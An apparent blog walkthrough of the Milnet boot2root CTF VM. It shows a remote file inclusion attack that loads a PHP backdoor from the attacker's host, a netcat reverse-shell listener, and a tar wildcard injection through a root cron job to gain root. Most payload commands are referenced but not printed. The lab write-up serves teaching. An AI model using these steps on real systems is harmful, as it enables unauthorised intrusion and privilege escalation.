Hack the Milnet VM (CTF Challenge)

This is a boot2root challenge which we will try to complete. This VM is created by Warrior and is a basic exploitable VM so we do not need to worry about any advance exploits and reverse engineering.

Download the VM from –> https://www.vulnhub.com/entry/milnet-1,148/

Breaching Methodology

  • Network Scanning (Nmap)
  • Recon (Nikto)
  • LFI due to allow_url_inclued
  • Install Tamper data (Firefox plugin)
  • Generate PHP Backdoor (Msfvenom)
  • Upload and execute a backdoor
  • Reverse connection (Metasploit)
  • Open UNIX wildcard text file
  • Privilege Escalation (cron job)
  • Import python one-liner for proper TTY shell
  • Take root access and capture the flag

Let’s start

As always start off by locating the target with the netdiscover command.  Our target is 192.168.1.100. Now we will scan our target with nmap to know all about its ports.

Since port 80 was open for http, therefore, we had explored target IP on the browser but didn’t get any useful information. So further we have decided to use Nikto against target URL.

To know more about our target we will use Nikto.

nikto -h 192.168.1.100

As per result dumped by Nikto it tells something about info.php, let verify it.

So when we have browsed http://192.168.1.100/info.php, we found “allow_url_include” is “on” which means we can call any local or remote file and hence it is pointing towards LFI and RFI vulnerability.

Upon finding the said vulnerability our step was clear i.e. we had use Tamper data(Firefox plugin).

So go to Tools on the menu bar and select Tamper data, When the Tamper Data opens click on Start Tamper.

Now generate the PHP code with the help of which we will have our meterpreter session and to generate the code type:

Copy the code from <?php to die() and save it on the file with extension .php, we have saved it as shell.php on the desktop and run command python SimpleHTTPServer 80 for transferring it into target’s system.

Then on Tamper Data give the path of the file without the extension in the text box adjacent to the route. For example type:

http://192.168.1.108/shell.php?

Before clicking on OK run metasploit and type:

And when you click on ok you will have your meterpreter session. You can type the following command to get the information of the system:

sysinfo

Then check the list of the thing present in langman by typing :

ls

There is only one folder available so let’s go into it.

cd SDINET

ls(to check the contents of SDINET)

Here, in SDINET you will find a text file which will show you all the steps to move ahead. It contains Unix wildcard attacks.

https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt

Some further digging revealed that crontab was running a backup script as root, which used tar to compress the contents of /var/www/html. One of the attacks mentioned in the text document covered tar. The commands we used are:

cat /etc/crontab

cat /backup/backup.sh

On a new terminal generate one-liner malicious code for achieving netcat reverse connection using msfvenom and enter following command for that.

After that copy and paste the generated code inside meterpreter session as described below and start netcat.

nc -lvp 8888

From inside DefenseCode_Unix_WildCards_Gone_Wild.txt, it has a section about how to get a command execution using tar command

Next we ran the following commands inside meterperter session:

The above commands help the tar command to run the file, shell.sh after the first file is archived. Since the backup.sh script is running as root, this has the effect of spawning a netcat shell and sending it to the attack platform on port 8888.

And if you go back to the terminal window where the listener was on, you will have victim’s reverse connection in some time, after that type following command  to import python one -liner script for accessing proper tty shell.

And you will root access, further move into /root directory and grab credit.txt file and finished this challenge.

HAPPPPPYYYY HACKIIIIING!!!!!! 

AuthorYashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

Leave a Reply

Your email address will not be published. Required fields are marked *